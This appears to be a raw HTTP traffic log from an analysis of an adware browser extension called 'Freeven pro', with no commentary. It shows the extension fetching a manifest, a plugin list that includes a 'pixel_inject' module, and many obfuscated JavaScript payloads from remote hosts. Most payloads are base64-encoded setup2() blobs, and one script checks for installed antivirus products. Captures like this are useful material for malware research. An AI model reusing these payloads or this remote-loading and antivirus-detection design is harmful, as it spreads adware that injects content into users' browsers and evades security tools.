GET /plugin/apps/54248/manifest/1_34_05_04/ie6/manifest.xml?ver=22&rnd=677 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:10 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427642855"
Last-Modified: Sun, 29 Mar 2015 15:27:35 GMT
Cache-Control: max-age=900
Content-Length: 1708
Content-Type: text/xml; charset=UTF-8
X-HW: 1427668151.dop005.fr7.t,1427668150.cds020.fr7.e
<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>111</Ver>. <ShortName>Freeven pro</ShortName>. <Description>Feven Shopping Companion</Description>. <PublisherName>Freeven</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.ourstatsstaticstack.com/plugin/apps/54248/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.ourstatsstaticstack.com/plugin/apps/54248/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>1</BackgroundVer>. <Manifest>NA</Manifest>. <
<<< skipped >>>
GET /plugin/apps/54248/js/na/ie/app_code.js?ver=111&rnd=2816 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427498129"
Last-Modified: Fri, 27 Mar 2015 23:15:29 GMT
Cache-Control: max-age=900
Content-Length: 3
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668151.dop002.fr7.t,1427668152.cds032.fr7.pr
.......
GET /plugin/apps/54248/plugins/na/ie/plugins.json?ver=103&rnd=9831 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427498130"
Last-Modified: Fri, 27 Mar 2015 23:15:30 GMT
Cache-Control: max-age=900
Content-Length: 17425
Content-Type: text/plain; charset=UTF-8
X-HW: 1427668152.dop002.fr7.t,1427668152.cds006.fr7.pr
{.."plugins_version": 103,.."plugins_list":. [. {"id":4,"url":"hXXp://js.ourstatsstaticstack.com/plugins/javascripts/jquery-1_7_1_min.js","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.ourstatsstaticstack.com/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{"id":3,"url":"hXXp://js.ourstatsstaticstack.com/plugins/mins/3.js","ver":2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled":true},{"id":47,"url":"http://js.ourstatsstaticstack.com/plugins/mins/47.js","ver":3,"name":"resources_background","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":0,"order":30000},{"run_at":5,"order":30000}],"enabled":true},{"id":246,"url":"hXXp://js.ourstatsstaticstack.com/plugins/mins/246.js","ver":17,"name":"setup","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":0,"order":5},{"run_at":1,"order":5}],"enabled":true},{"id":253,"url":"hXXp://js.ourstatsstaticstack.com/plugins/mins/253.js","ver":2,"name":"pixel_inject","browsers":{"ie":true,"ff":true,"ch
<<< skipped >>>
GET /plugins/mins/42.js?ver=10&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1409568411"
Last-Modified: Mon, 01 Sep 2014 10:46:51 GMT
Cache-Control: max-age=185
Content-Length: 7866
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop002.fr7.t,1427668152.cds034.fr7.c
var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI==="undefined"){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window=="undefined"){window={};}if(typeof window.document==="undefined"){window.document={};document=window.document;}if(typeof window.alert==="undefined"){window.alert=function(b){var c;if(typeof b==="undefined"){c="undefined";}else{if(b===null){c="null";}else{c=b.toString();}}if(typeof c==="string"){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console==="undefined"){window.console={};console=window.console;}if(typeof console.log==="undefined"){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info==="undefined"){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn==="undefined"){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error==="undefined"){window.console.error=function(a){};console.error=window.console.error;}if(typeof console.assert==="undefined"){window.console.assert=function(a){};console.assert=window.console.assert;}if(typeof console.dir==="undefined"){window.console.dir=function(a){};console.dir=window.console.dir;}if(typeof console.clear==="undefined"){window.console.clear=function(a){};console.clear=window.console.clear;}if(typeof console.profile==="undefined"){window.console.profile=function(a){};console.profile=window.console.profile;}if(typeof console.profileEnd==="undefined"){window.console.profileEn
<<< skipped >>>
GET /plugins/mins/391.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426068985"
Last-Modified: Wed, 11 Mar 2015 10:16:25 GMT
Cache-Control: max-age=900
Content-Length: 795
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop002.fr7.t,1427668152.cds025.fr7.c
if (typeof setup2 === 'function') { setup2('MTk0YjAwMWYwMTE3MmQxYTFlNTM1ODRiMDAxZjAxMTc0MjQ3NWQxMjA2MDcwYjBhMTYwZjFkNDUxMzVmMDMwMjA5MDYxNDBlMTAwYzVjMWYwNzFkNDcxODAwMDU1NzAwNDI0ODVhNWIwYTBlNWEzODI3MmIyMDNlMzEzYTNhMjIzMTIyMmEzNzM3MjkzNjJjMjYyZjMwMjMyNzNiMjczMzNkMjAyYzM0MmE0ODE0NDYxODAyNWQxOTAxMGY0ODU1NGE1MTQ2NTcwNzExMWM1NjJhMzgzYjNhM2QyMjMxM2IyMTJmMzAzNTI3MjkyMjIxM2QyNzI5MjYzMDM4Mjc0YTVlNTMwYTFkMWMxYjA2MzIwYTA0NTA0YjQwMDExYzFmMDUxNDQyNDc1ZDEyMDYwNzBiMGExNjBmMWQ0NTEzNWYwMzAyMDkwNjE0MGUxMDBjNWMxZjA3MWQ0NzE4MDAwNTU3MDA0MjQ4NWE1YjBhMGU1YTM4MjcyYjIwM2UzMTNhM2EyMjMxMjIyYTM3MzcyOTM2MmMyNjJmMzAyMzI3M2IyNzMzM2QyMDJjMzQyYTQ4MTQ0NjE4MDI1ZDE5MDEwZjQ4NTU0YTUxNDY1NzA3MTExYzU2MmEzODNiM2EzZDIyMzEzYjIxMmYzMDM1MjcyOTIyMjEzZDI3MjkyNjMwMzgyNzRhNWU1MzEyMDUxZDBjMWMwOTMxMGM1MDRiNTE1MDU5MTY=', 'bihkugxhrq'); }....
GET /plugins/mins/380.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1424181436"
Last-Modified: Tue, 17 Feb 2015 13:57:16 GMT
Cache-Control: max-age=900
Content-Length: 1303
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop002.fr7.t,1427668152.cds022.fr7.c
if (typeof setup2 === 'function') { setup2('MWE3Mzc4NDcwMTE3MWUxNjJkMGEwZDViNGI0NTRiMGIxZTEyMDg0MjRlNTYxMjAxMDc0ZDBkMDkwYjExMDYxNzAyMDAxYjE1NDQwNTE3MTU0ZTFhMTI0YTA4NGQwMDE1NDcyNzNlMGEwMzA2MzYwZjA1MDUxOTBjMGUwYjJlM2E1NDAwMDk0NDU0NzI2ODViMTkxMTFkMTMxOTMzMGExNDQzNDM1MTQ3MDExNzFlMTYwYjQyNGU1NjE1NTcwODViMGI1MjA5NDE0ZjBhMDIwOTQ3MGIxZDA1MWMxNjRmMTcxNDExNDYwMDA5NDkxOTU2MGIwYTRlM2EzNjEwMTgwNTI3MTQwZTFhMTAxMTA2MTEzNTM5NDUxYjAyNWI1ZDZmNjA0MTFhMGEwZDFmMDgxNzM4MDE0YjU5NGE1NTQwNDg0ZDczNTE0NTQ5NDM0ODBmMTYxNDA4MTcxNDJmM2E0MTUwNDY1YTBmMDgxNzE1MGExZTRkMzUzOTE2MGMwNzI2MTgwNzAwMDAzNTM5NDU1ZjNlMjYzMjM3MjYzMDM5MzQzMTNjMjQyYjJlMmMyNzMwM2UyNzM0MzQyNDJiMmUzMDNhMjYzODM5MzEzYzNlMjY1NjVlMWUwYTA0MDIxNzBmNGYyNjJlMGIxZDA1MzUxMDFkMGEwODI2MmU1ODRlM2MzNTI1MmEzNzMyMmEyMzJjMmQyNjM4MzkyZTNkMzMzMDM3MmMyYzMxMzUzOTVmNDMxNjEwMWYwMTA2MTQ0NDM5MjcxNjE1MWYyZTA3MWIzYzM1NWI1ZjI3M2UzYTIzMmEzYTMwMzgyZjNjM2QzMzI2MzMzNzI2MzQzOTIzMmEyNzNlNWU0YTEyMDAwZDBlMDkwZjU2M2UyNjFmMTEwZjNjMDkwYjA4MjczZTQ0NTYzYTM2MjAzODI5MmIyYjMzMzAzNTIwM2IzYzI5MjczNTI4M2UzMDM1M2EzNjQ0NTExMTExMTYwNTE2MDY0YjM2M2MwNDEyMWUyNzA2MWMxZTNhMzY1ZTRkMzkyNzNiMzMzNjIyMzYzYjJhMmUyMzJhMjcyMjM2MjQyYjNkMzEzMzM5M2IzNzI1M2MyZTNhNGU1ODFkMGYxNjFjMGUwZTVmM2EzNjBkMWUwMDI3MTYwMDE0MTQzYTM2NWU0ZDM5MjczYjMzMzYyMjM2M2IyYTJlMjMyYTI3MjAyOTIxM2EyNzIyMjcyMzI3Mjc0NjQyNTM2ZjE0', 'ayqeicjfxx'); }....
<<< skipped >>>
GET /plugins/mins/334.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1415748965"
Last-Modified: Tue, 11 Nov 2014 23:36:05 GMT
Cache-Control: max-age=900
Content-Length: 967
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds005.fr7.c
if (typeof setup2 === 'function') { setup2('MTk2OTRhNTc1OTRjNTYwYzE3MWYxMjM2MTgxYjViNTY1NDQ2MGIxZjE2MTM1MDU4NTYwOTBjMTA1MjQ1MTUwNjA4MDQxNjAwMTkwYjBkNDUwMTBjMDc1ODBlMWYyYjBiMDEwZDNkNWE1OTQ2MTM1NDJiNGEwOTE4NWQwMDBiMWEwOTBkMWQwMzBkMjIwNjVlMzUyODNhM2UzYjM3MzAzOTJiMjcyZjI1MjYyZjM1MjkzMzM0MmIyNzM1Mjg1ZjBmMWIxMTBkMWYxMDFhMjkxODFkMDk0OTNiM2MyODMwMmMzOTI0MmIyNTMwMjEzMTM0MjEyYzNmMzkyZDNlMmQzYjIwMjQyNjI2MzUyODVmMDUxYTE3MTcwYTBlMGYwYjAzMTAwMzFhMzAwYTA2MDc1ZTM1MjgzYTNlM2IzNzMwMzkyYjI3MmYyNTI2MjUzYTM3MzcyYTJlMmYzNTIzMzAyMTMxM2IzYzRkMDMxMzFhM2UzZDUxMmIzYjIwMzkyZDMwMzkyNTMwMjgzMTM2M2MyYTMyMzMzNTNlM2QzMzJiNDIyYTI5MmIyMDU3MjgyNjJmMjYyYjMwMzgzMDJhMmUzMjJiMzMzZDJhMzAzZjIzMmYyNjMyMmIzMzIxMzcyNjM5M2QyYTJlMjgyNjRhMTUxNDEzMjUwMzBlMGY0YTI2MzMzNzM2MmMzODMxMzEyMzMzM2MzZTJiMjUzMzNiM2QyZDJiM2EzYzMzMmI0MjEwMWUwMDJhMmU0YTI2MzMzNzM2MmMzODMxMzEyMzMzM2MzZTJiMjEzYjNmMjcyZDJlMzIzZDMzMjczMTIxMzQyYjI3MzUyODViNDA3ZTQ0NDM0YjQyNDExYTFiMGMwYjFkMGEyYTBmNDA1OTRhNDQ0YTU4N2UxOQ==', 'bcjwyltdck'); }....
GET /plugins/mins/273.js?ver=6&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418314330"
Last-Modified: Thu, 11 Dec 2014 16:12:10 GMT
Cache-Control: max-age=900
Content-Length: 903
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds029.fr7.c
if (typeof setup2 === 'function') { setup2('MWE3ZTUxNDI0YzRiNGQwYzEyMDAxMTIxMDMwZTRlNTE0ZjQ2MGUwMDE1MDQ0YjRkNDMwODA1MTc0ODE4MDgxYTFhMDAwMzA3MDYwNzQ4MTcwZTE5NWUxMTBmMDExYzRiMDUxZTEyNWIxMjE2MTQwMTFjNGEwYzA3NWUxNTE3MDQzMzAyMGI1OTU3NDU1NTQxNTcxMTE5MDkwZTAyMDAyYjA4MTA0YzNkMzMyODNkMmIzNTI3MzMzZDM1MjczZTM0MmEzYzMyMzEyZjMwMzQyNjMzMzgzYTI2MzkzZDI1MmIyZTQ0MWYwOTFkMDUwODEwNWMyYjJlMjEzZTI0M2MzNzM0M2QyNTMxMjMzZDJkM2IzZjNiMjgzNTJjMzEyZTNkNGU0NzY1NDQ0NjU0NDE1NjE5MTYxODFiMWMzMTE0MTg0MzRlNTE0MDA0MWYxYjE0MTU0ZTRlNWIxMjA4MWY0NTAzMGQwODFmMDMxYjFkMGIwZjQ1MGMwYjBiNWIxMjE3MWIxMTQzMDgwNTE3NDkxNzE1MGMxYjExNDIwMTFjNWIwNzEyMDcyYjE4MDY1MTVhNWU1MDUzNTIxMjAxMTMwMzBhMGQzMDBkMDI0OTNlMmIzMjMwMjMzODNjMzYyZjMwMjQyNjJlMjczNDNmMmEyYTIyMzEyNTJiMjIzNzJlMzQyNjIwMzkyYjQ3MDcxMzEwMGQwNTBiNTkzOTJiMjIyNjNlMzEzZjM5MjYyMDIzMjYzZTM1MjEzMjMzMjUyZTI5MjMyYjNlNTY1ZDY4NGM0YjRmNDQ0NDA0MGQwMTE2MGIwMjIyMGI0NjVjNTQ1MzQzNDI2ODEx', 'atqblkodft'); }....
GET /plugins/mins/242.js?ver=4&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403211500"
Last-Modified: Thu, 19 Jun 2014 20:58:20 GMT
Cache-Control: max-age=900
Content-Length: 1023
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds009.fr7.c
if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }....
GET /plugins/mins/230.js?ver=7&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273144"
Last-Modified: Sun, 17 Aug 2014 10:59:04 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds022.fr7.c
if (typeof setup2 === 'function') { setup2('MDM3YzY3NDMwMDFlMWUwODNkMWYxNDU0NTQ0MTRhMDIxZTBjMTg1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDA2MTUxYzFhMTkyZDFhMDE1YTRjNGU0MzAwMWUxZTA4MWI1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDFlMGQxZDBkMDMxNjIxMDk1YTRjNGU1MzViNWE0NjcyNDg0ZDU4NTY0YzE3MGQxODFlMTEwYjBjMTQ1NDU0NDEzMzQ4MGIxYzFiNGYyNTVhNjQ0MTQ4NGE0YTVhMDEwMzE0MWYwMDA0MjIzOTQ4NDI0ODRmMGYxZjAwMDUwNzFkNDQyNzFhMWIwMjQ3NTk1MTU4MTI1YjQ4NWM1YjU4NGI0ZTFhNDg0ZDFhMGQwYTAxMTEwNTA2MDQxYTM1MTkwZDBhMDQxYzUxNTQ0MTRmMzUzNTNiM2EyMjJiMjUzYzI4MmMyZjM4MjcyZDM1MmMzMzIwMjUyZDJlMzUyYjNkMmYyNzNmMmEzZTM3NGQ0NjU4NGYwYzFjMTIwMTBmMDYwYjA3MWQ0ZjU3NTg1MTMxM2UyYjM4MjUyYjNiM2YzMTMyMmIzMzM3MmIzYTI4MzcyMzM5M2IyYjNlMzc0ZDE3NDM0YTY3MDU=', 'xvnahjjxhm'); }....
GET /plugins/mins/223.js?ver=9&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418314404"
Last-Modified: Thu, 11 Dec 2014 16:13:24 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds015.fr7.c
if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MDgxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFjNTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNjE0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQyNTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0MjgzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJjMDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYTAzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMxODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIyMmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMDE5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }....
GET /plugins/mins/200.js?ver=4&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411077330"
Last-Modified: Thu, 18 Sep 2014 21:55:30 GMT
Cache-Control: max-age=900
Content-Length: 807
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds020.fr7.c
if (typeof setup2 === 'function') { setup2('MTc2NjY1NGQxODEyMTcwNjMzMDAwMDRlNTY0ZjUyMGUxNzAyMTY0ODQzNDMxZTFhMWMwMzEwNTgwMDFkMTQxNTA4MGExMTBhNGQxNTA5MWY0MzFhNWQ0MTQwNDkxNDFlMGYwNjA5MDAwNTFjMDQ0OTUyNDY1MTQyNDMzMzMzMmMyMjI5MzAyNTM0M2IyODI5M2UzMDM1M2UzNzMzMjgzNjI5MjgzMzNjMjUyNDNjM2YyMjJkMzM1MzFjMGUwMjEyMGQxMzE0M2MwZDAxMDk1MjJmMzkyMDI0MjkyMTNmM2UyNTJiMzUzNDNjMzczNjIyMzMyMjJkMjIzNTM5M2M1NDRhNzg2NTRlMDQxYjA0MTYxMDIzMTQxZTRlNTY0YzRkMTgxMjE3MDYxNTQ4NDM0MzFlMWExYzAzMTA1ODAwMWQxNDE1MDgwYTExMGE0ZDE1MDkxZjQzMWE1ZDQxNDA0OTE0MWUwZjA2MDkwMDA1MWMwNDQ5NTI0NjUxNDI0MzMzMzMyYzIyMjkzMDI1MzQzYjI4MjkzZTMwMzUzZTM3MzMyODM2MjkyODMzM2MyNTI0M2MzZjIyMmQzMzUzMWMwZTAyMTIwZDEzMTQzYzBkMDEwOTUyMmYzOTIwMjQyOTIxM2YzZTI1MmIzNTM0M2MzNzM2MjIzMzIyMmQyMjM1MzkzYzU0NGE3ODY1NGUxYzAzMDUwMTBhMTgyZjE2NGU1NjRjNWQ0MDU2NjkwYg==', 'lllopfcvfr'); }....
GET /plugins/mins/220.js?ver=38&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420463978"
Last-Modified: Mon, 05 Jan 2015 13:19:38 GMT
Cache-Control: max-age=619
Content-Length: 39907
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds020.fr7.c
if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var z={"\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1,"\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2,"\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4,"\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8,"\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16,"\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64":32,"\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":64,"\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":128,"\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64":256,"\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":512,"\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1024,"\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2048,"\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4096,"\x73\x70\x61\x72\x6B\x5F\x62\x61\x69\x64\x75\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8192,"\x62\x32\x63\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16384,"\x63\x72\x6F\x73\x73\x72\x69\x64\x65\x72\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x64":32768,"\x79\x6F\x6E\x74\x6F\x6F\x5F\x64\x65\x74\x65\x63\x74\x65\x64":65536,"\x61\x76\x67\x5F\x73\x61\x66\x65\x67\x75\x61\x72\x64\x5F\x64\x65\x74\x65\x63\x74\x65\x64":131072,"\x67\x65\x65\x6B\x5F\x62\x75\
<<< skipped >>>
GET /plugins/mins/9.js?ver=3&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1402409612"
Last-Modified: Tue, 10 Jun 2014 14:13:32 GMT
Cache-Control: max-age=900
Content-Length: 2385
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668153.cds037.fr7.c
